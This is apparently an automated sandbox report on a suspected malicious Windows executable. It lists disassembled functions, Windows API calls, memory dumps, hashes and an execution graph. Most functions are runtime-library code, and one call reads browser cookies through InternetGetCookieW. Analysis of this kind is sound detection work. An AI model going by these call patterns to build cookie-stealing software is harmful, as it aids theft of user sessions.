                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 447 ac44a8-ac44bf GetLastError 448 ac44cd-ac44d2 447->448 449 ac44c1-ac44cb call ac5904 447->449 451 ac44d4 call ac480c 448->451 449->448 454 ac451e-ac4525 SetLastError 449->454 453 ac44d9-ac44df 451->453 455 ac44ea-ac44f8 call ac595a 453->455 456 ac44e1 453->456 457 ac4527-ac452c 454->457 463 ac44fd-ac4513 call ac4296 call ac4869 455->463 464 ac44fa-ac44fb 455->464 458 ac44e2-ac44e8 call ac4869 456->458 466 ac4515-ac451c SetLastError 458->466 463->454 463->466 464->458 466->457
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00AC47FE,00AC7E79,?,00AC686F,?,00000004,00000000,?,?,?,00AC3BCD,?,00000000), ref: 00AC44AD
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC44E2
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4509
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00AC4516
                                                                                                                                                                                                                                                        • SetLastError.KERNEL32(00000000,?,?,?,?,?,?), ref: 00AC451F
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                                                                                                                                        • Opcode ID: 5457023e59e251497171e3170c4705edfe72f80e8a9b3dabbe65d4865b307fc0
                                                                                                                                                                                                                                                        • Instruction ID: 62259c50762e623aae8b916d3a72743ddf767c138f04f6e013371f5f40c63f94
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5457023e59e251497171e3170c4705edfe72f80e8a9b3dabbe65d4865b307fc0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7C01F936600604BB9216B7B46D66F2B366DABDD371B37412DF42AD2182FF318D024228
                                                                                                                                                                                                                                                        Function 00AC6176 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                        control_flow_graph 470 ac6176-ac6181 471 ac61dc-ac61de 470->471 472 ac6183-ac618b 470->472 473 ac618d-ac6193 call ac4869 472->473 474 ac6194-ac619d 472->474 473->474 476 ac619f-ac61a5 call ac4869 474->476 477 ac61a6-ac61af 474->477 476->477 480 ac61b8-ac61c1 477->480 481 ac61b1-ac61b7 call ac4869 477->481 482 ac61ca-ac61d3 480->482 483 ac61c3-ac61c9 call ac4869 480->483 481->480 482->471 487 ac61d5-ac61db call ac4869 482->487 483->482 487->471
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC618E
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: HeapFree.KERNEL32(00000000,00000000,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?), ref: 00AC487F
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: GetLastError.KERNEL32(?,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?,?), ref: 00AC4891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC61A0
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC61B2
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC61C4
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC61D6
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: e3d85022c81707823fadb8f7d2c56ede190a551edbc812254d94d6414d94bb0e
                                                                                                                                                                                                                                                        • Instruction ID: 429438bcaa5cb6486c379859c62003e2c1b1655faec7b5d794db7238c0b0232d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e3d85022c81707823fadb8f7d2c56ede190a551edbc812254d94d6414d94bb0e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B9F0F636601200BF9660EF95FA91E5A37EDAA44B1171E080EF00ED7442C734FC818754
                                                                                                                                                                                                                                                        Function 00AC3D8F Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC3DAD
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: HeapFree.KERNEL32(00000000,00000000,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?), ref: 00AC487F
                                                                                                                                                                                                                                                          • Part of subcall function 00AC4869: GetLastError.KERNEL32(?,?,00AC620D,?,00000000,?,00000000,?,00AC6234,?,00000007,?,?,00AC669F,?,?), ref: 00AC4891
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC3DBF
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC3DD2
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC3DE3
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC3DF4
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                                                                                                                                        • Opcode ID: d686f6214497b1ccd9d0c79a14a373592fc19bddd61fcf8cb62ea2c50764bdd2
                                                                                                                                                                                                                                                        • Instruction ID: 45264df9a0c890955bd672a82e50d14f244353c4876c8950c30c47fc304a0462
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d686f6214497b1ccd9d0c79a14a373592fc19bddd61fcf8cb62ea2c50764bdd2
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DFF03A79902260AFEB82EF95FD51B893B61AB58720302425BF4039A2B1C7350A43CFC4
                                                                                                                                                                                                                                                        Function 00AC2F53 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\3coxOaV92n.exe,00000104), ref: 00AC2F93
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC305E
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC3068
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                        • String ID: C:\Users\user\Desktop\3coxOaV92n.exe
                                                                                                                                                                                                                                                        • API String ID: 2506810119-4138872258
                                                                                                                                                                                                                                                        • Opcode ID: 905e3681752ee9231eab1a93b3c6a9efc62fb7f1462a14b23c0d20155befeb1c
                                                                                                                                                                                                                                                        • Instruction ID: bceab1f3a77f1221db1307126995d3dbc80bf213335e318a7760e3fb71a7489f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 905e3681752ee9231eab1a93b3c6a9efc62fb7f1462a14b23c0d20155befeb1c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C8315E76A00258FFDB21DB999D81EAEBBBCEB85710F11806FF40597211D7718A41CB91
                                                                                                                                                                                                                                                        Function 00AC25E3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00AC2594,00000000,?,00AD1B50,?,?,?,00AC2737,00000004,InitializeCriticalSectionEx,00ACBC48,InitializeCriticalSectionEx), ref: 00AC25F0
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00AC2594,00000000,?,00AD1B50,?,?,?,00AC2737,00000004,InitializeCriticalSectionEx,00ACBC48,InitializeCriticalSectionEx,00000000,?,00AC24C7), ref: 00AC25FA
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 00AC2622
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                        • String ID: api-ms-
                                                                                                                                                                                                                                                        • API String ID: 3177248105-2084034818
                                                                                                                                                                                                                                                        • Opcode ID: df746e05b6f9f0cd2f3e42fb98b26ecb64f8e28fedb8aca577bac87f43341d00
                                                                                                                                                                                                                                                        • Instruction ID: e63fd0b1d0e44841575cacda22f0f41f9645f68fd8d7fc122696bcb651ff8109
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: df746e05b6f9f0cd2f3e42fb98b26ecb64f8e28fedb8aca577bac87f43341d00
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58E01A30690304FBEF211BA0EC07F5A7B58FB14B52F134424F91DE80A1E7A2A9569A68
                                                                                                                                                                                                                                                        Function 00AC57DD Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,00AC5784,00000000,00000000,00000000,00000000,?,00AC5981,00000006,FlsSetValue), ref: 00AC580F
                                                                                                                                                                                                                                                        • GetLastError.KERNEL32(?,00AC5784,00000000,00000000,00000000,00000000,?,00AC5981,00000006,FlsSetValue,00ACC4D8,FlsSetValue,00000000,00000364,?,00AC44F6), ref: 00AC581B
                                                                                                                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00AC5784,00000000,00000000,00000000,00000000,?,00AC5981,00000006,FlsSetValue,00ACC4D8,FlsSetValue,00000000), ref: 00AC5829
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: LibraryLoad$ErrorLast
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3177248105-0
                                                                                                                                                                                                                                                        • Opcode ID: ec7b9c54d46b7ac5f337e86e9d7a5449e0b18e4814ef7d1b52d659b629555946
                                                                                                                                                                                                                                                        • Instruction ID: fc8cbb7b38bc9b71c7ccd3729965042df74a527e31996bf2a6eb5f5a98e3c14d
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ec7b9c54d46b7ac5f337e86e9d7a5449e0b18e4814ef7d1b52d659b629555946
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7101AC32A15626EBCB218FF8DC45F577758AF057A1B130528F916E7140DB21E842D7F0
                                                                                                                                                                                                                                                        Function 00AC48BB Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • _free.LIBCMT ref: 00AC4A27
                                                                                                                                                                                                                                                          • Part of subcall function 00AC474D: IsProcessorFeaturePresent.KERNEL32(00000017,00AC473C,00000000,?,00000004,00000000,?,?,?,?,00AC4749,00000000,00000000,00000000,00000000,00000000), ref: 00AC474F
                                                                                                                                                                                                                                                          • Part of subcall function 00AC474D: GetCurrentProcess.KERNEL32(C0000417), ref: 00AC4771
                                                                                                                                                                                                                                                          • Part of subcall function 00AC474D: TerminateProcess.KERNEL32(00000000), ref: 00AC4778
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2297830490.0000000000AC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AC0000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297784317.0000000000AC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297847746.0000000000ACB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297864149.0000000000AD1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2297884482.0000000000AD3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_ac0000_3coxOaV92n.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                                                                        • String ID: *?$.
                                                                                                                                                                                                                                                        • API String ID: 2667617558-3972193922
                                                                                                                                                                                                                                                        • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                        • Instruction ID: 6f6d35a278370c95911547e3520750006d3c57eb57229880de07ff66f4586792
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A518E75E00219AFDF14CFA8C891EAEBBB5EF5C310F26816EE454E7341E6319E018B54

                                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                                        Execution Coverage:17.9%
                                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                        Signature Coverage:0%
                                                                                                                                                                                                                                                        Total number of Nodes:435
                                                                                                                                                                                                                                                        Total number of Limit Nodes:52
                                                                                                                                                                                                                                                        execution_graph 42085 7ff848ec9371 42086 7ff848ec938f 42085->42086 42087 7ff848ec946f 42086->42087 42091 7ff848ec947f 42086->42091 42093 7ff848ec963a 42086->42093 42099 7ff848ea0f30 LoadLibraryExW 42087->42099 42094 7ff848ec947a 42091->42094 42100 7ff848ea0f30 LoadLibraryExW 42091->42100 42094->42093 42095 7ff848e8a568 42094->42095 42097 7ff848ec9f40 42095->42097 42096 7ff848ec962e 42097->42096 42101 7ff848eb73c0 42097->42101 42099->42094 42100->42094 42103 7ff848eb73e5 42101->42103 42104 7ff848eb74fd 42103->42104 42105 7ff848e8a518 42103->42105 42104->42097 42107 7ff848eb7640 42105->42107 42106 7ff848eb76bc 42106->42103 42107->42106 42108 7ff848e84c90 LoadLibraryExW 42107->42108 42108->42106 41863 7ff848ebc8f5 41864 7ff848ebc91f 41863->41864 41867 7ff848e872b0 41864->41867 41866 7ff848ebca49 41868 7ff848e872df 41867->41868 41869 7ff848e872d6 41867->41869 41872 7ff848e83f30 41868->41872 41869->41866 41871 7ff848e872e4 41871->41866 41875 7ff848e815c8 41872->41875 41874 7ff848e83f55 41874->41871 41877 7ff848e815d1 41875->41877 41876 7ff848e81683 41876->41874 41877->41876 41878 7ff848e81802 LoadLibraryExW 41877->41878 41879 7ff848e81836 41878->41879 41879->41874 41880 7ff848eca4f2 41882 7ff848eca4fd 41880->41882 41881 7ff848eca4e2 41882->41881 41883 7ff848e872b0 LoadLibraryExW 41882->41883 41884 7ff848eca59a 41883->41884 41885 7ff848eca63d 41884->41885 41888 7ff848eca685 41884->41888 41891 7ff848e84c90 41885->41891 41887 7ff848eca677 41890 7ff848eca6f3 41888->41890 41896 7ff848e86027 LoadLibraryExW 41888->41896 41892 7ff848e84cb8 41891->41892 41893 7ff848e84cc3 41891->41893 41892->41887 41894 7ff848e83f30 LoadLibraryExW 41893->41894 41895 7ff848e84cc8 41894->41895 41895->41887 41896->41890 42109 7ff848ec6375 42110 7ff848ec6384 42109->42110 42113 7ff848ec5f50 42110->42113 42112 7ff848ec6399 42114 7ff848ec7b40 42113->42114 42123 7ff848e81548 42114->42123 42116 7ff848ec7b7e 42128 7ff848e953d0 42116->42128 42118 7ff848ec7c35 42119 7ff848e87cc0 LoadLibraryExW 42118->42119 42120 7ff848ec7c47 42119->42120 42121 7ff848e84c90 LoadLibraryExW 42120->42121 42122 7ff848ec7c80 42121->42122 42122->42112 42125 7ff848e81551 42123->42125 42124 7ff848e81683 42124->42116 42125->42124 42126 7ff848e81802 LoadLibraryExW 42125->42126 42127 7ff848e81836 42126->42127 42127->42116 42129 7ff848e87cc0 LoadLibraryExW 42128->42129 42130 7ff848e953e3 42129->42130 42130->42118 41897 7ff848eca2ed 41898 7ff848eca30f 41897->41898 41900 7ff848eca334 41898->41900 41901 7ff848e86020 41898->41901 41902 7ff848e86025 41901->41902 41904 7ff848eb5ae4 41902->41904 41905 7ff848e9ecb0 41902->41905 41904->41900 41907 7ff848e9ece2 41905->41907 41906 7ff848e9ee14 41906->41904 41907->41906 41908 7ff848e84c90 LoadLibraryExW 41907->41908 41909 7ff848e9f00f 41908->41909 42249 7ff848e83d36 42250 7ff848e83d3d 42249->42250 42251 7ff848e82e48 LoadLibraryExW 42250->42251 42252 7ff848e83e2a 42251->42252 42255 7ff848e82e20 42252->42255 42257 7ff848e82e25 42255->42257 42256 7ff848e82e59 42257->42256 42258 7ff848e82e08 LoadLibraryExW 42257->42258 42260 7ff848e83e8a 42257->42260 42258->42260 42259 7ff848e83e4c 42260->42259 42261 7ff848e82e30 LoadLibraryExW 42260->42261 42261->42259 42135 7ff848e84b75 42136 7ff848e84b7f 42135->42136 42137 7ff848e83f30 LoadLibraryExW 42136->42137 42138 7ff848e84bad 42137->42138 42262 7ff848eb8029 42263 7ff848eb8037 42262->42263 42264 7ff848e872b0 LoadLibraryExW 42263->42264 42266 7ff848eb80b0 42264->42266 42265 7ff848eb819c 42266->42265 42267 7ff848e84c90 LoadLibraryExW 42266->42267 42268 7ff848eb813d 42267->42268 42269 7ff848e84c90 LoadLibraryExW 42268->42269 42269->42265 42016 7ff848e9a1af 42017 7ff848e9a1c3 42016->42017 42022 7ff848e86038 42017->42022 42019 7ff848e9a557 42021 7ff848e9a1cb 42021->42019 42026 7ff848e86048 42021->42026 42023 7ff848e86027 42022->42023 42024 7ff848e9ecb0 LoadLibraryExW 42023->42024 42025 7ff848eb5ae4 42023->42025 42024->42025 42025->42021 42027 7ff848e8604d 42026->42027 42028 7ff848e9ecb0 LoadLibraryExW 42027->42028 42029 7ff848eb5ae4 42027->42029 42028->42029 42029->42019 42270 7ff848ec302d 42272 7ff848ec3032 42270->42272 42271 7ff848ec3194 42272->42271 42273 7ff848e84c90 LoadLibraryExW 42272->42273 42274 7ff848ec318b 42273->42274 41910 7ff848eb16e0 41911 7ff848eb16ea 41910->41911 41912 7ff848eb170b 41910->41912 41911->41912 41914 7ff848eb176c 41911->41914 41913 7ff848e84c90 LoadLibraryExW 41912->41913 41918 7ff848eb1761 41913->41918 41916 7ff848e84c90 LoadLibraryExW 41914->41916 41915 7ff848eb1b30 41920 7ff848eb17c2 41916->41920 41917 7ff848e84c90 LoadLibraryExW 41917->41915 41921 7ff848e84c90 LoadLibraryExW 41918->41921 41927 7ff848eb1af4 41918->41927 41919 7ff848eb1b44 41920->41918 41920->41919 41922 7ff848e84c90 LoadLibraryExW 41920->41922 41925 7ff848eb19ae 41921->41925 41923 7ff848eb18b7 41922->41923 41923->41918 41924 7ff848e84c90 LoadLibraryExW 41923->41924 41924->41918 41925->41919 41926 7ff848e84c90 LoadLibraryExW 41925->41926 41925->41927 41926->41927 41927->41915 41927->41917 42030 7ff848ebd9a0 42031 7ff848e815f8 LoadLibraryExW 42030->42031 42032 7ff848ebd9f7 42031->42032 42143 7ff848ec3067 42144 7ff848ec3078 42143->42144 42145 7ff848e84c90 LoadLibraryExW 42144->42145 42147 7ff848ec30b7 42145->42147 42146 7ff848ec3194 42147->42146 42148 7ff848e84c90 LoadLibraryExW 42147->42148 42149 7ff848ec318b 42148->42149 42275 7ff848e9e725 42276 7ff848e9e72f 42275->42276 42279 7ff848e86040 42276->42279 42278 7ff848e9e764 42280 7ff848e86045 42279->42280 42281 7ff848e9ecb0 LoadLibraryExW 42280->42281 42282 7ff848eb5ae4 42280->42282 42281->42282 42282->42278 42150 7ff848eca761 42151 7ff848eca784 42150->42151 42152 7ff848eca732 42151->42152 42154 7ff848e86027 LoadLibraryExW 42151->42154 42154->42152 42033 7ff848ec15a5 42035 7ff848ec15bf 42033->42035 42034 7ff848ec15e0 42035->42034 42037 7ff848ec16f2 42035->42037 42042 7ff848eb6fc0 42035->42042 42041 7ff848ec1754 42037->42041 42045 7ff848ec045f LoadLibraryExW 42037->42045 42039 7ff848ec1de3 42046 7ff848ec045f LoadLibraryExW 42039->42046 42043 7ff848e87cc0 LoadLibraryExW 42042->42043 42044 7ff848eb6fd5 42043->42044 42044->42037 42045->42039 42046->42041 42283 7ff848e8bf19 42284 7ff848e8bf2f 42283->42284 42286 7ff848e84c90 LoadLibraryExW 42284->42286 42287 7ff848e8c086 42284->42287 42289 7ff848e8bfe6 42286->42289 42288 7ff848e8c12e 42287->42288 42291 7ff848e8a4c8 42287->42291 42290 7ff848e84c90 LoadLibraryExW 42289->42290 42290->42287 42292 7ff848e8c5d0 42291->42292 42293 7ff848e872b0 LoadLibraryExW 42292->42293 42294 7ff848e8c60b 42293->42294 42295 7ff848e84c90 LoadLibraryExW 42294->42295 42296 7ff848e8c663 42295->42296 42301 7ff848e8a4c0 42296->42301 42298 7ff848e8c682 42298->42287 42299 7ff848e8c674 42299->42298 42300 7ff848e84c90 LoadLibraryExW 42299->42300 42300->42298 42302 7ff848e8d350 42301->42302 42303 7ff848e8d460 42302->42303 42305 7ff848e8d3cc 42302->42305 42304 7ff848e84c90 LoadLibraryExW 42303->42304 42308 7ff848e8d449 42303->42308 42304->42308 42306 7ff848e84c90 LoadLibraryExW 42305->42306 42306->42308 42307 7ff848e8d62c 42307->42299 42308->42307 42309 7ff848e8d5db 42308->42309 42310 7ff848e84c90 LoadLibraryExW 42308->42310 42311 7ff848e84c90 LoadLibraryExW 42309->42311 42310->42309 42311->42307 42155 7ff848eb1f52 42157 7ff848eb1f7f 42155->42157 42156 7ff848eb218e 42157->42156 42158 7ff848e97700 LoadLibraryExW 42157->42158 42159 7ff848eb1fe2 42157->42159 42158->42159 42159->42156 42160 7ff848e97700 LoadLibraryExW 42159->42160 42162 7ff848eb201d 42159->42162 42160->42162 42161 7ff848eb207a 42165 7ff848e97700 LoadLibraryExW 42161->42165 42168 7ff848eb208e 42161->42168 42162->42161 42163 7ff848eb2055 42162->42163 42164 7ff848e97700 LoadLibraryExW 42162->42164 42163->42161 42166 7ff848eb20a8 42163->42166 42164->42163 42165->42168 42166->42168 42170 7ff848e97700 LoadLibraryExW 42166->42170 42167 7ff848e84c90 LoadLibraryExW 42169 7ff848eb2117 42167->42169 42168->42167 42171 7ff848e84c90 LoadLibraryExW 42169->42171 42170->42168 42172 7ff848eb213f 42171->42172 42173 7ff848e84c90 LoadLibraryExW 42172->42173 42174 7ff848eb2172 42173->42174 42174->42156 42175 7ff848e872b0 LoadLibraryExW 42174->42175 42176 7ff848eb2381 42175->42176 42177 7ff848e85990 LoadLibraryExW 42176->42177 42178 7ff848eb23a6 42177->42178 42179 7ff848e85990 LoadLibraryExW 42178->42179 42180 7ff848eb242b 42179->42180 41928 7ff848e8e8d2 41931 7ff848e8e8ff InternetGetCookieW 41928->41931 41930 7ff848e8eac9 41931->41930 41932 7ff848eb8dd6 41933 7ff848eb8de3 41932->41933 41935 7ff848eb8ec4 41933->41935 41950 7ff848e97700 41933->41950 41936 7ff848e872b0 LoadLibraryExW 41935->41936 41937 7ff848eb8f30 41936->41937 41938 7ff848eb8f44 41937->41938 41939 7ff848e97700 LoadLibraryExW 41937->41939 41940 7ff848e97700 LoadLibraryExW 41938->41940 41941 7ff848eb8f75 41938->41941 